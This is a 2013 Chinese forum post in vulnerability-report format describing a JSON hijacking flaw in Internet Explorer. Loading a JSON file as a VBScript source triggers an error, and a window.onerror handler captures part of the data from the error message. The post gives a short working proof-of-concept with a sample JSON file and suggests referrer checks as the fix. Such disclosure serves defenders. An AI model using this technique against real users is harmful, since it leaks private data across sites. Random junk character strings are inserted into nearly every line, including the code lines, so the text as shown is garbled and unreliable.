找回密码
 立即注册
查看: 2313|回复: 0
打印 上一主题 下一主题

IE通用JSON劫持漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-23 11:33:57 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
简要描述:
& ^' A" [; J, ~" o! `9 F0 R  @# z, S& X
由于某些资源容器对数据处理不当导致json劫持漏洞.
, N( L# k7 u7 J+ [详细说明:1 f6 p9 Y) \+ j! ?! v7 b- ]
由于ie支持vbscript,所以script元素可以指定成vbscript语言:" K2 S5 e) z1 Z' v& L" s) Y7 X
<script language=vbscript></script>
9 k- j) \% H/ J8 ]' r, M ' O5 \7 [( p! h2 L  d
当但我们指定的是一个js格式的文件是将会发现一个异常,这使我们通过捕获这个异常的信息来获得部分json数据.
4 Q1 W$ F9 ~" {$ G1 I7 h漏洞证明:
; {! |8 W$ ^& p' A0 P7 H4 {. [<script>+ L* e& }6 b& V4 E
window.onerror=function(_){4 Y8 Y3 ~6 N2 L
alert(_)
# s: p; R/ @. i8 I2 p}6 H9 K" B  o. {% ~7 d# m; P0 x
</script>$ R" }, D' y/ x9 A
<script language=vbscript src=1.json></script>
  [+ P  h1 t0 s
( M% H0 O2 P7 j( }) @7 |
/ s: E1 A+ U' D# }1.json:! P- W; @0 a( ]$ ?- M( T" r* l
[{"name":"sogili","age":19}]
5 P$ |; g" z! l: n1 f- h/ i修复方案:
6 [+ i- ^' i# F3 H网站业务对于这个问题可以通过验证referrer是否为同源来防御
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表